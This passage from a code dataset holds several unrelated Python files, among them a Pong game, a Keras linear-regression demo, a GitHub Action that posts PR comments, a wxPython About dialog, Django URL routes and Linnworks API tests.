8\r\nPAD_HEIGHT = 80\r\nHALF_PAD_WIDTH = PAD_WIDTH / 2\r\nHALF_PAD_HEIGHT = PAD_HEIGHT / 2\r\nLEFT = False\r\nRIGHT = True\r\n\r\npaddle1_pos = HEIGHT / 2.0\r\npaddle2_pos = HEIGHT / 2.0\r\npaddle1_vel = 0.0\r\npaddle2_vel = 0.0\r\nball_pos = [WIDTH / 2, HEIGHT / 2]\r\nball_vel = [0,0]\r\ntime = 0\r\nplayer_left = 0\r\nplayer_right = 0\r\n\r\n# helper function to restrict paddeles from moving off-canvas\r\ndef paddle_offcanvas(paddle_pos, paddle_vel):\r\n \r\n paddle_off = paddle_pos + paddle_vel\r\n \r\n if paddle_off >= HALF_PAD_HEIGHT:\r\n if paddle_off <= HEIGHT - HALF_PAD_HEIGHT:\r\n paddle_pos += paddle_vel\r\n \r\n return paddle_pos\r\n\r\n# timer\r\ndef timer_handler():\r\n global time\r\n time += 1\r\n return time\r\n\r\ndef timer_restart():\r\n global time\r\n timer.stop()\r\n time = 0\r\n return time\r\n\r\n# initialize ball_pos and ball_vel for new bal in middle of table\r\n# if direction is RIGHT, the ball's velocity is upper right, else upper left\r\ndef spawn_ball(direction):\r\n global ball_pos, ball_vel # these are vectors stored as lists\r\n \r\n horizontal_vel = random.randrange(120,240)/100.0\r\n vertical_vel = random.randrange(60,180)/100.0\r\n \r\n if direction:\r\n ball_vel = [horizontal_vel, vertical_vel] \r\n else:\r\n ball_vel = [-horizontal_vel, vertical_vel]\r\n \r\n \r\n ball_pos = [WIDTH / 2, HEIGHT / 2]\r\n \r\n\r\n# define event handlers\r\ndef new_game():\r\n global paddle1_pos, paddle2_pos, paddle1_vel, paddle2_vel # these are numbers\r\n global player_right, player_left # these are ints\r\n \r\n random_start = random.randint(0, 1)\r\n if random_start == 0:\r\n spawn_ball(LEFT)\r\n elif random_start == 1:\r\n spawn_ball(RIGHT)\r\n \r\n player_right, player_left = 0, 0\r\n\r\ndef draw(canvas):\r\n global paddle1_pos, paddle2_pos, ball_pos, ball_vel, player_right, player_left\r\n \r\n # draw mid line and gutters\r\n canvas.draw_line([WIDTH / 2, 0],[WIDTH / 2, HEIGHT], 1, \"White\")\r\n canvas.draw_line([PAD_WIDTH, 0],[PAD_WIDTH, HEIGHT], 1, \"White\")\r\n canvas.draw_line([WIDTH - PAD_WIDTH, 0],[WIDTH - PAD_WIDTH, HEIGHT], 1, \"White\")\r\n \r\n # update ball\r\n ball_pos[0] += ball_vel[0]\r\n ball_pos[1] += ball_vel[1]\r\n \r\n if ball_pos[1] > HEIGHT - BALL_RADIUS:\r\n ball_vel[1] = - ball_vel[1] \r\n elif ball_pos[1] < BALL_RADIUS:\r\n ball_vel[1] = - ball_vel[1]\r\n\r\n # draw ball\r\n canvas.draw_circle(ball_pos, BALL_RADIUS, 2, \"Red\", \"White\")\r\n \r\n # update paddle's vertical position, keep paddle on the screen\r\n paddle1_pos = paddle_offcanvas(paddle1_pos, paddle1_vel)\r\n paddle2_pos = paddle_offcanvas(paddle2_pos, paddle2_vel)\r\n \r\n # draw paddles\r\n canvas.draw_line([0, paddle1_pos - HALF_PAD_HEIGHT],[0, paddle1_pos + HALF_PAD_HEIGHT], PAD_WIDTH*2,\"White\")\r\n canvas.draw_line([WIDTH - HALF_PAD_WIDTH, paddle2_pos - HALF_PAD_HEIGHT],[WIDTH - HALF_PAD_WIDTH, paddle2_pos + HALF_PAD_HEIGHT], PAD_WIDTH,\"White\")\r\n \r\n # determine whether paddle and ball collide\r\n if ball_pos[0] < PAD_WIDTH + BALL_RADIUS:\r\n if ball_pos[1] <= paddle1_pos + HALF_PAD_HEIGHT and ball_pos[1] >= paddle1_pos - HALF_PAD_HEIGHT:\r\n ball_vel[0] = - ( ball_vel[0] + ball_vel[0] * 0.1)\r\n ball_vel[1] = ball_vel[1] + ball_vel[1] * 0.1\r\n else:\r\n timer.start()\r\n if time == 3:\r\n spawn_ball(RIGHT)\r\n player_right += 1\r\n timer_restart()\r\n \r\n if ball_pos[0] > WIDTH - BALL_RADIUS - PAD_WIDTH:\r\n if ball_pos[1] <= paddle2_pos + HALF_PAD_HEIGHT and ball_pos[1] >= paddle2_pos - HALF_PAD_HEIGHT:\r\n ball_vel[0] = - (ball_vel[0] + ball_vel[0] * 0.1)\r\n ball_vel[1] = ball_vel[1] + ball_vel[1] * 0.1\r\n else:\r\n timer.start()\r\n if time == 3:\r\n spawn_ball(LEFT)\r\n player_left += 1\r\n timer_restart()\r\n \r\n # draw scores\r\n canvas.draw_text(str(player_left), (WIDTH / 4, HEIGHT / 4), 44, \"White\")\r\n canvas.draw_text(str(player_right), (WIDTH / 1.3, HEIGHT / 4), 44, \"White\")\r\n \r\ndef keydown(key):\r\n global paddle1_vel, paddle2_vel\r\n \r\n if key == simplegui.KEY_MAP['down']:\r\n paddle2_vel += 5\r\n elif key == simplegui.KEY_MAP['up']:\r\n paddle2_vel -= 5\r\n \r\n if key == simplegui.KEY_MAP['s']:\r\n paddle1_vel += 5\r\n elif key == simplegui.KEY_MAP['w']:\r\n paddle1_vel -= 5\r\n \r\ndef keyup(key):\r\n global paddle1_vel, paddle2_vel\r\n \r\n paddle2_vel = 0\r\n paddle1_vel = 0\r\n\r\n# create frame\r\nframe = simplegui.create_frame(\"Pong\", WIDTH, HEIGHT)\r\nframe.set_draw_handler(draw)\r\nframe.set_keydown_handler(keydown)\r\nframe.set_keyup_handler(keyup)\r\n\r\n# timer\r\ntimer = simplegui.create_timer(100, timer_handler)\r\n\r\n# buttons\r\nbutton1 = frame.add_button('Restart', new_game)\r\n\r\n# start frame\r\nnew_game()\r\nframe.start()\r\n\r\n","sub_path":"Pong: Game .py","file_name":"Pong: Game .py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"48394898","text":"from typing import Any\nfrom app import schemas, models\nfrom app.crud.base import CRUDBase\nfrom sqlalchemy.orm import Session\n\n\nclass CRUDPlotQueue(\n CRUDBase[\n models.PlotQueue,\n schemas.PlotQueueCreate,\n schemas.PlotQueueUpdate,\n schemas.PlotQueueReturn,\n ]\n):\n def get_multi_by_server(\n self,\n db: Session,\n *,\n server: models.Server,\n filtration: schemas.FilterData[Any] = schemas.FilterData[Any]()\n ) -> tuple[int, list[models.PlotQueue]]:\n query = db.query(self.model).filter(self.model.server == server)\n return self._filter_multi_query(query, filtration)\n\n def get_multi_linked_to_directory(\n self,\n db: Session,\n *,\n directory: models.Directory,\n filtration: schemas.FilterData[Any] = schemas.FilterData[Any]()\n ) -> tuple[int, list[models.PlotQueue]]:\n query = db.query(self.model).filter(\n (self.model.temp_dir == directory) | (self.model.final_dir == directory)\n )\n return self._filter_multi_query(query, filtration)\n","sub_path":"app/crud/plot_queue.py","file_name":"plot_queue.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"167535952","text":"import os\nimport sys\nimport datetime\nimport time\nimport subprocess\n\n#空陣列\nnull_array=[]\n\n#ServerLog前一小時時間資料夾(年_月_日)\n#ServerLog_time_last=(datetime.datetime.now()- datetime.timedelta(hours=1)).strftime(\"%Y_%m_%d_%H\")\n\ndef CheckServer(sp_logsourcepath):\n #第一層資料夾\n array=[]\n for dirPaths in os.walk(sp_logsourcepath):\n array.append(dirPaths[1])\n #print(array)\n break\n \n array2=[]\n loop=0\n #判斷如果有AS寫入路徑\n while loop < len(array[0]):\n if array[0][loop] == \"AS\":\n array2.append(sp_logsourcepath+array[0][loop])\n loop+=1\n \n #完整資料夾路徑\n loop=0 \n while loop < len(array[0]):\n for dirPaths in os.walk(sp_logsourcepath+array[0][loop]+\"\\\\\"):\n if dirPaths[1]!=null_array:\n loop1=0\n while loop1 < len(dirPaths[1]):\n array2.append(dirPaths[0]+dirPaths[1][loop1])\n loop1+=1\n break\n loop+=1\n\n #清除檔案\n files = open(\"C:\\\\OpenApplication\\\\OpenApplication_checkpath.txt\",'w')\n files.close()\n\n\n #路徑儲存\n loop2=0\n while loop2 < len(array2):\n files1 = open(\"C:\\\\OpenApplication\\\\OpenApplication_checkpath.txt\",'a')\n #if(os.path.isfile(array2[loop2]+\"\\\\SysNrmMsg\"+ServerLog_time_last+\".txt\")):\n files1.write(array2[loop2]+\"\\n\")\n files1.close()\n loop2+=1\n","sub_path":"MaintenanceTools/OpenApplication/OpenApplication_checkpath.py","file_name":"OpenApplication_checkpath.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"495094229","text":"'''Trains a simple deep NN linear regression (Multilayer perceptron) on the MNIST dataset. 28X28 images of digits\n\nGets to 98.40% test accuracy after 20 epochs\n(there is *a lot* of margin for parameter tuning).\n2 seconds per epoch on a K520 GPU.\n'''\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\n\nfrom keras.layers import Dense\nfrom keras.models import Model, Sequential\nfrom keras import initializers\n\ndef kpi_returns(prices):\n return ((prices-prices.shift(-1))/prices)[:-1]\n\n\n\ndef kpi_sharpeRatio():\n\n risk_free_rate = 2.25 # 10 year US-treasury rate (annual) or 0\n sharpe = 2\n # ((mean_daily_returns[stocks[0]] * 100 * 252) - risk_free_rate ) / (std[stocks[0]] * 100 * np.sqrt(252))\n return sharpe\n\ndef kpi_commulativeReturn():\n return 2\n\n\ndef kpi_risk(df):\n return df.std()\n\n\ndef kpi_sharpeRatio():\n return 2\n\n\n\ndef softmax(z):\n assert len(z.shape) == 2\n s = np.max(z, axis=1)\n s = s[:, np.newaxis]\n e_x = np.exp(z - s)\n div = np.sum(e_x, axis=1)\n div = div[:, np.newaxis]\n return e_x / div\n\ndef loss_log():\n return 2\n\ndef loss_mse():\n return 2\n\n\ndef loss_gdc():\n return 2\n\ndef activation_sigmoid():\n return 2\n\n\ndef plot_selected(df, columns, start_index, end_index):\n \"\"\"Plot the desired columns over index values in the given range.\"\"\"\n # TODO: Your code here\n # Note: DO NOT modify anything else!\n #df = df[columns][start_index:end_index]\n df.ix[start_index:end_index, columns]\n df = normalize(df)\n plot_data(df)\n\ndef plot_data(df, title=\"normalized Stock prices\"):\n \"\"\"Plot stock prices with a custom title and meaningful axis labels.\"\"\"\n ax = df.plot(title=title, fontsize=12)\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Price\")\n plt.show()\n\ndef plot_image(df, title):\n plt.figure()\n plt.imshow(df[0])#, cmap=plt.cm.binary)\n plt.colorbar()\n plt.gca().grid(False)\n plt.title(title)\n plt.show()\n\ndef plot_images(x,y, title):\n plt.figure(figsize=(10,10))\n for i in range(25):\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(x[i], cmap=plt.cm.binary)\n plt.xlabel(y[i])\n plt.show()\n\ndef plot_stat_loss_vs_time(history_dict) :\n acc = history_dict['acc']\n val_acc = history_dict['val_acc']\n loss = history_dict['loss']\n val_loss = history_dict['val_loss']\n\n epochs = range(1, len(acc) + 1)\n\n # \"bo\" is for \"blue dot\"\n plt.plot(epochs, loss , 'bo', label='Training loss')\n # b is for \"solid blue line\"\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss over time')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n plt.show()\n\ndef plot_stat_accuracy_vs_time(history_dict) :\n acc = history_dict['acc']\n val_acc = history_dict['val_acc']\n loss = history_dict['loss']\n val_loss = history_dict['val_loss']\n epochs = range(1, len(acc) + 1)\n\n plt.plot(epochs, acc , 'bo', label='Training acc')\n plt.plot(epochs, val_acc, 'b' , label='Validation acc')\n plt.title('Training and validation accuracy over time')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n\n plt.show()\n\n\ndef plot_stat_train_vs_test(history):\n hist = history.history\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.plot(hist['loss'])\n plt.plot(hist['val_loss'])\n plt.title ('model loss')\n plt.legend (['train Error', 'test Error'], loc='upper right')\n plt.show()\n\n\n# normalize to first row\ndef normalize(df):\n return df/df.ix[0,:]\n\n\ndef normalize(x):\n train_stats = x_train.describe()\n return (x - train_stats['mean']) / train_stats['std']\n\n\ndef symbol_to_path(symbol, base_dir=\"\"):\n \"\"\"Return CSV file path given ticker symbol.\"\"\"\n return os.path.join(base_dir, \"{}.csv\".format(str(symbol)))\n\n\ndef get_data_from_disc(symbols, dates):\n \"\"\"Read stock data (adjusted close) for given symbols from CSV files.\"\"\"\n df = pd.DataFrame(index=dates)\n if 'GOOG' not in symbols: # add GOOG for reference, if absent\n symbols.insert(0, 'GOOG')\n\n for symbol in symbols:\n df_temp = pd.read_csv(symbol_to_path(symbol), index_col='Date',\n parse_dates=True, usecols=['Date', 'Adj Close'], na_values=['nan'])\n\n df_temp = df_temp.rename(columns={'Adj Close': symbol})\n print(df_temp.head())\n df = df.join(df_temp)\n if symbol == 'GOOG': # drop dates GOOG did not trade\n df = df.dropna(subset=[\"GOOG\"])\n\n return df\n\ndef get_data_from_web(symbol):\n start, end = '2007-05-02', '2016-04-11'\n data = web.DataReader(symbol, 'yahoo', start, end)\n data=pd.DataFrame(data)\n prices=data['Adj Close']\n prices=prices.astype(float)\n return prices\n\n\ndef get_state(parameters, t, window_size = 20):\n outside = []\n d = t - window_size + 1\n for parameter in parameters:\n block = (\n parameter[d : t + 1]\n if d >= 0\n else -d * [parameter[0]] + parameter[0 : t + 1]\n )\n res = []\n for i in range(window_size - 1):\n res.append(block[i + 1] - block[i])\n for i in range(1, window_size, 1):\n res.append(block[i] - block[0])\n outside.append(res)\n return np.array(outside).reshape((1, -1))\n\n## Set the mean, standard deviation, and size of the dataset, respectively\nmu, sigma, size = 0, 4, 100\n\n## Set the slope (m) and y-intercept (b), respectively\nm, b = 2, 100\n\n## Create a uniformally distributed set of X values between 0 and 10 and store in pandas dataframe\nx = np.random.uniform(0,10, size)\ndf = pd.DataFrame({'x':x})\n\n## Find the \"perfect\" y value corresponding to each x value given\ndf['y_perfect'] = df['x'].apply(lambda x: m*x+b)\n\n\n## Create some noise and add it to each \"perfect\" y value to create a realistic y dataset\ndf['noise'] = np.random.normal(mu, sigma, size=(size,))\ndf['y'] = df['y_perfect']+df['noise']\n\n## Plot our noisy dataset with a standard linear regression\n## (note seaborn, the plotting library, does the linear regression by default)\nax1 = sns.regplot(x='x', y='y', data=df)\n\nprint ('\\ndata = ',df)\n\n\n## Create our model with a single dense layer, with a linear activation function and glorot (Xavier) input normalization\nprint('\\ncreate model...')\n#model = Sequential([Dense(1, activation='linear', input_shape=(1,), kernel_initializer='glorot_uniform')])\n\nmodel = Sequential()# stack of layers\nmodel.add(Dense (1, activation='linear', input_shape=(1,), kernel_initializer='glorot_uniform'))\nmodel.summary()\n## Compile our model using the method of least squares (mse) loss function\n## and a stochastic gradient descent (sgd) optimizer\nmodel.compile( loss ='mse'\n , optimizer='sgd') ## To try our model with an Adam optimizer simple replace 'sgd' with 'Adam'\n\n## Set our learning rate to 0.01 and print it\n#model.optimizer.lr.set_value(.001)\n#print ('optimizer=',model.optimizer.lr.get_value())\n\n## Fit our model to the noisy data we create above. Notes:\n## The validation split parameter reserves 20% of our data for validation (ie 80% will be used for training)\n## The callback parameter is where we tell our model to use the callback function created above\n## I don't really know if using a batch size of 1 makes sense\nhistory = model.fit( x=df['x']\n , y=df['y']\n , validation_split= 0.2\n , batch_size = 1\n , epochs = 100\n # , callbacks=[print_save_weights]\n )\n\n## As the model is fitting the data you can watch below and see how our m and b parameters are improving\n\n## Save and print our final weights\npredicted_m = model.get_weights()[0][0][0]\npredicted_b = model.get_weights()[1][0]\nprint (\"\\nm=%.2f b=%.2f\\n\" % (predicted_m, predicted_b))#m=2.45 b=99.48\n\nplot_stat_train_vs_test(history)\n\n# Plot our model's prediction over the data and real line\n## Create our predicted y's based on the model\ndf['y_predicted'] = df['x'].apply(lambda x: predicted_m*x + predicted_b)\n## Plot the original data with a standard linear regression\nax1 = sns.regplot(x='x', y='y', data=df, label='real')\n\n## Plot our predicted line based on our Keras model's slope and y-intercept\nax2 = sns.regplot(x='x', y='y_predicted', data=df, scatter=False, label='predicted')\nax2.legend(loc=\"upper left\")\n\n\n\n\n\n","sub_path":"examples/mnist_linear_reg.py","file_name":"mnist_linear_reg.py","file_ext":"py","file_size_in_byte":8477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"621008800","text":"import asyncio\nimport os\nimport json\nfrom aiogithubapi import GitHub\nfrom aiogithubapi.common.const import BASE_API_HEADERS, BASE_API_URL\n\nIDENTIFIER = \"\"\nHEADER = \"🎉 **HACS repository validator action summary** 🎉\"\n\n\ndef get_token():\n with open(f\"{os.getenv('GITHUB_ACTION_PATH')}/data/token\", \"r\") as token:\n return token.read().replace(\"\\n\", \"\")\n\n\ndef get_event():\n with open(os.getenv('GITHUB_EVENT_PATH'), \"r\") as event:\n return event.read()\n\n\ndef get_result():\n with open(f\"{os.getenv('GITHUB_ACTION_PATH')}/result\", \"r\") as result:\n return result.read()\n\n\nasync def post():\n event = json.loads(get_event())\n if not event.get('pull_request'):\n return\n\n async with GitHub(get_token()) as github:\n name = event[\"repository\"][\"full_name\"]\n number = event[\"pull_request\"][\"number\"]\n msg = f\"{HEADER}\\n{get_result()}\\n\\n{IDENTIFIER}\"\n\n _headers = BASE_API_HEADERS\n _headers[\"Authorization\"] = f\"token {github.client.token}\"\n _endpoint = f\"{BASE_API_URL}/repos/{name}/issues/{number}/comments\"\n\n request = await github.client.session.get(_endpoint, headers=_headers)\n comments = await request.json()\n for comment in comments:\n if IDENTIFIER in comment[\"body\"] and comment[\"user\"][\"login\"] == 'github-actions[bot]':\n _endpoint = f\"{BASE_API_URL}/repos/{name}/issues/comments/{comment['id']}\"\n result = await github.client.session.patch(_endpoint, json={\"body\": msg}, headers=_headers)\n if result.status != 200:\n if result.reason != \"Forbidden\":\n print(_endpoint)\n print(result.reason)\n exit(1)\n return\n\n result = await github.client.session.post(_endpoint, json={\"body\": msg}, headers=_headers)\n if result.status != 201:\n if result.reason != \"Forbidden\":\n print(_endpoint)\n print(result.reason)\n exit(1)\n\n\nasyncio.get_event_loop().run_until_complete(post())\n","sub_path":"helpers/post_result.py","file_name":"post_result.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88029951","text":"## -*- coding: utf-8 -*-\n# Copyright © 2011-2012 Mike Fled \n\nimport wx\n\nfrom configobj import __version__ as version_configobj\nfrom Crypto import __version__ as version_pycrypto\nfrom platform import python_version as version_python\nfrom psutil import __version__ as version_psutil\nfrom wx import __version__ as version_wxpython\nfrom yarest import __version__ as version_yarest\n\ntry:\n from ssh import __version__ as version_sshlib\nexcept ImportError:\n from paramiko import __version__ as version_sshlib\n\nfrom ._constants import APP_NAME, BLANK_LINES, RESIZE_NO, RESIZE_OK, UTF8\nfrom ._docs import license, acknowledgements\nfrom ._images import logo_128\nfrom ._messages import (label_about, label_acknowledgements, label_license,\n label_version, label_versions, label_website)\n\n\n# layout variables\nheader_flags = wx.ALIGN_CENTER | wx.ALL\n\nlogo_flags = wx.ALIGN_RIGHT | wx.ALL\nlogo_height = 128\nlogo_width = 128\n\ntabs_height = 256\ntabs_width = 512\n\nurl_flags = wx.ALIGN_LEFT | wx.ALIGN_TOP | wx.LEFT | wx.RIGHT | wx.TOP\nversion_flags = wx.ALIGN_LEFT | wx.ALIGN_TOP | wx.LEFT | wx.RIGHT | wx.TOP\nwidget_padding = 7\n\nclass AboutWindow (wx.Dialog):\n def __init__(self, parent):\n wx.Dialog.__init__(self, parent, wx.ID_ANY, label_about % (APP_NAME),\n style=wx.CLOSE_BOX | wx.MINIMIZE_BOX)\n self.Bind(wx.EVT_CLOSE, self._on_close)\n\n # inner layout sizers\n headersizer = wx.BoxSizer(wx.HORIZONTAL)\n header_textsizer = wx.BoxSizer(wx.VERTICAL)\n header_logosizer = wx.BoxSizer(wx.VERTICAL)\n tabsizer = wx.BoxSizer(wx.HORIZONTAL)\n footersizer = wx.BoxSizer(wx.HORIZONTAL)\n\n # header text\n desc = wx.StaticText(self, wx.ID_ANY, \"Yet Another REmote Support Tool\")\n self._set_font_bold(desc)\n header_textsizer.Add(desc, RESIZE_NO, header_flags, widget_padding)\n\n version = wx.StaticText(self, wx.ID_ANY,\n label_version + \" \" + version_yarest)\n header_textsizer.Add(version, RESIZE_NO, header_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, label_website,\n \"http://code.google.com/p/yarest/\")\n header_textsizer.Add(url, RESIZE_NO, header_flags, widget_padding)\n\n headersizer.Add(header_textsizer, RESIZE_NO, wx.ALL, widget_padding)\n\n # header logo\n image = wx.StaticBitmap(self, wx.ID_ANY, logo_128.GetBitmap())\n header_logosizer.Add(image, RESIZE_NO, logo_flags, widget_padding)\n\n headersizer.Add(header_logosizer, RESIZE_NO, logo_flags, widget_padding)\n\n # notebook tabs\n notebook = wx.Notebook(self, size=(tabs_width, tabs_height))\n\n acknowledge_tab = _AcknowledgementsPanel(notebook)\n license_tab = _LicensePanel(notebook)\n versions_tab = _VersionsPanel(notebook)\n\n notebook.AddPage(acknowledge_tab, label_acknowledgements)\n notebook.AddPage(license_tab, label_license)\n notebook.AddPage(versions_tab, label_versions)\n\n tabsizer.Add(notebook, RESIZE_NO, wx.ALL, widget_padding)\n\n # footer\n okbutton = wx.Button(self, wx.ID_OK)\n wx.EVT_BUTTON(self, wx.ID_OK, self._on_close)\n footersizer.Add(okbutton, RESIZE_NO, wx.ALL, widget_padding)\n\n # add inner sizers to outer sizer\n outersizer = wx.BoxSizer(wx.VERTICAL)\n outersizer.Add(headersizer, RESIZE_NO, wx.ALIGN_CENTER)\n outersizer.Add(tabsizer, RESIZE_NO, wx.ALIGN_CENTER)\n outersizer.Add(footersizer, RESIZE_NO, wx.ALIGN_RIGHT)\n\n # resize and theme the window\n self.SetIcon(parent.GetIcon())\n self.SetSizerAndFit(outersizer)\n self.SetThemeEnabled(True)\n\n def _on_close(self, event):\n self.Destroy()\n\n def _set_font_bold(self, widget):\n font = widget.GetFont()\n font.SetWeight(wx.BOLD)\n widget.SetFont(font)\n\n\nclass _AcknowledgementsPanel (wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n data = wx.TextCtrl(self, wx.ID_ANY, acknowledgements.encode(UTF8),\n style=wx.TE_MULTILINE | wx.TE_READONLY)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(data, RESIZE_OK, wx.EXPAND)\n self.SetSizer(sizer)\n\n\nclass _LicensePanel (wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n data = wx.TextCtrl(self, wx.ID_ANY, license.encode(UTF8),\n style=wx.TE_MULTILINE | wx.TE_READONLY)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(data, RESIZE_OK, wx.EXPAND)\n self.SetSizer(sizer)\n\n\nclass _VersionsPanel (wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n\n gridsizer = wx.FlexGridSizer(rows=0, cols=2, vgap=0, hgap=0)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"Python\",\n \"http://www.python.org/\")\n version = wx.StaticText(self, wx.ID_ANY, version_python())\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"wxPython\",\n \"http://www.wxpython.org/\")\n version = wx.StaticText(self, wx.ID_ANY, version_wxpython)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"PyCrypto\",\n \"http://www.pycrypto.org/\")\n version = wx.StaticText(self, wx.ID_ANY, version_pycrypto)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"ssh/Paramiko\",\n \"https://github.com/bitprophet/ssh/\")\n version = wx.StaticText(self, wx.ID_ANY, version_sshlib)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"ConfigObj\",\n \"http://www.voidspace.org.uk/python/configobj.html\")\n version = wx.StaticText(self, wx.ID_ANY, version_configobj)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n url = wx.HyperlinkCtrl(self, wx.ID_ANY, \"psutil\",\n \"http://code.google.com/p/psutil/\")\n version = wx.StaticText(self, wx.ID_ANY, version_psutil)\n gridsizer.Add(url, RESIZE_NO, url_flags, widget_padding)\n gridsizer.Add(version, RESIZE_NO, version_flags, widget_padding)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(gridsizer, RESIZE_OK, wx.EXPAND)\n self.SetSizer(sizer)\n","sub_path":"yarest/gui/_about.py","file_name":"_about.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589596735","text":"from django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.contrib import admin\n\nfrom cornerwise.views import index, contact_us\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^parcel/', include(\"parcel.urls\")),\n url(r'^project/', include(\"project.urls\")),\n url(r'^proposal/', include(\"proposal.urls\")),\n url(r\"^doc/\", include(\"proposal.doc_urls\")),\n url(r\"^task/\", include(\"task.urls\")),\n url(r\"^user/\", include(\"user.urls\")),\n url(r\"^contact$\", contact_us, name=\"contact-us\"),\n url(r\"^$\", index, name=\"front-page\"),\n]\n\nif settings.SERVE_MEDIA:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.SERVE_STATIC:\n urlpatterns += static(\n settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"server/cornerwise/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"185998270","text":"from unittest.mock import Mock\n\nimport pytest\n\nfrom linnapi.requests import inventory\n\n\n@pytest.fixture\ndef image_id():\n return \"eea21827-491d-4022-996a-d068dd6b25ea\"\n\n\n@pytest.fixture\ndef stock_item_id():\n return \"972af264-d768-4c6c-9152-0ad9d9d5b352\"\n\n\n@pytest.fixture\ndef sort_order():\n return 5\n\n\n@pytest.fixture\ndef kwargs(image_id, stock_item_id, sort_order):\n return {\n \"row_id\": image_id,\n \"stock_item_id\": stock_item_id,\n \"sort_order\": sort_order,\n \"is_main\": True,\n }\n\n\ndef test_update_images_url():\n url = \"https://eu-ext.linnworks.net/api/Inventory/UpdateImages\"\n assert inventory.UpdateImages.URL == url\n\n\ndef test_update_images_method():\n assert inventory.UpdateImages.METHOD == \"POST\"\n\n\ndef test_update_images_multi_headers(kwargs):\n assert inventory.UpdateImages.headers([kwargs]) == {}\n\n\ndef test_update_images_multi_params(kwargs):\n assert inventory.UpdateImages.params([kwargs]) is None\n\n\ndef test_update_images_multi_data(kwargs):\n assert inventory.UpdateImages.multi_data([kwargs]) is None\n\n\ndef test_update_images_multi_json(kwargs, stock_item_id, image_id, sort_order):\n expected_response = {\n \"images\": [\n {\n \"pkRowId\": image_id,\n \"StockItemId\": stock_item_id,\n \"IsMain\": True,\n \"SortOrder\": sort_order,\n }\n ]\n }\n assert inventory.UpdateImages.multi_json([kwargs]) == expected_response\n\n\ndef test_update_images_multi_json_with_multiple_requests(\n kwargs, stock_item_id, image_id, sort_order\n):\n expected_response = {\n \"images\": [\n {\n \"pkRowId\": image_id,\n \"StockItemId\": stock_item_id,\n \"IsMain\": True,\n \"SortOrder\": sort_order,\n },\n {\n \"pkRowId\": image_id,\n \"StockItemId\": stock_item_id,\n \"IsMain\": True,\n \"SortOrder\": sort_order,\n },\n {\n \"pkRowId\": image_id,\n \"StockItemId\": stock_item_id,\n \"IsMain\": True,\n \"SortOrder\": sort_order,\n },\n ]\n }\n assert (\n inventory.UpdateImages.multi_json([kwargs, kwargs, kwargs]) == expected_response\n )\n\n\ndef test_update_images_multi_parse_response(kwargs):\n response = Mock()\n response.text = \"Test Text\"\n assert inventory.UpdateImages.parse_response(response, [kwargs]) == response.text\n","sub_path":"tests/test_requests/test_inventory_requests/test_update_images.py","file_name":"test_update_images.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191769782","text":"import os\r\n\r\nCUR_DIR_ABS_PATH = os.path.dirname(os.path.abspath(__file__))\r\nINPUT_FILE_NAME = '03_input.txt'\r\nINPUT_FILE_PATH = os.path.join(CUR_DIR_ABS_PATH, INPUT_FILE_NAME) \r\nSLOPES = [(1,1), (1,3), (1,5), (1,7), (2,1)]\r\n\r\ndef find_trees(row_step, col_step, map):\r\n width = len(map[0]) - 1\r\n height = len(map)\r\n row = 0\r\n col = 0\r\n trees = 0\r\n\r\n while row + 1 < height:\r\n col += col_step\r\n row += row_step\r\n if map[row][col%width] == 